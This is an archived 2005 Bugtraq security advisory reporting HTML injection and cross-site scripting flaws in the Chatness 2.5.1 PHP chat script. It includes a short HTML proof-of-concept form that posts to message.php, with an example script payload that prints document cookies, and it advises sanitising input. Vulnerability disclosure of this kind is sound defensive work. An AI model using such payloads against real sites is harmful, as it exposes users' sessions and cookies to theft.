lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050329140742.31336.qmail@www.securityfocus.com> Date: 29 Mar 2005 14:07:42 -0000 From: PersianHacker Team <pi3ch@...oo.com> To: bugtraq@...urityfocus.com Subject: [PersianHacker.NET 200503-12]Chatness 2.5.1 and prior XSS Vulnerabilities [PersianHacker.NET 200503-12]Chatness 2.5.1 and prior Html Injection Vulnerability Date: 2005 March Bug Number: 12 Chatness Chatness is a PHP based chat script.It has enough flexibility to fit any users needs, and enough modification options to customly fit into any site http://www.chatness.us Discussion: -------------------- Html Injection & Cross-Site Scripting The script does not properly validate user-supplied input in the 'user' field. A remote user can create specially crafted HTML that, when loaded by the target user, will cause arbitrary scripting code to be executed by the target user's browser. Also 'message' field in "message.php" Exploit: -------------------- <html> <head> <title>Chatness 2.5.1 Html Injection Exploit</title> </head> <body> <h1>Chatness 2.5.1 Html Injection Exploit</h1> <form method="POST" action="http://www.example.com/message.php"> <b>XSS in message.php:</b><p> Username: <input type="text" name="message" size="48" value="XSS Injection Code"></p> <p> <br> example: <script>document.write(document.cookie)</script></p> <p> <input type='submit' name='login' value='RUN!' class='button'></p> </form> <p> </p> <p align="center"><a href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p> </body> </html> Solution: -------------------- Edit the source code to ensure that input is properly sanitised. Credit: -------------------- Discovered by PersianHacker.NET Security Team by 3nitro (3nitro[@]persianhacker[.]net) http://www.PersianHacker.NET Special Thanks: Pi3cH Help -------------------- visit: http://www.PersianHacker.NET or mail me @: 3nitro[@]persianhacker[.]net Note -------------------- script authors contacted for this vulnerablility.
Powered by blists - more mailing lists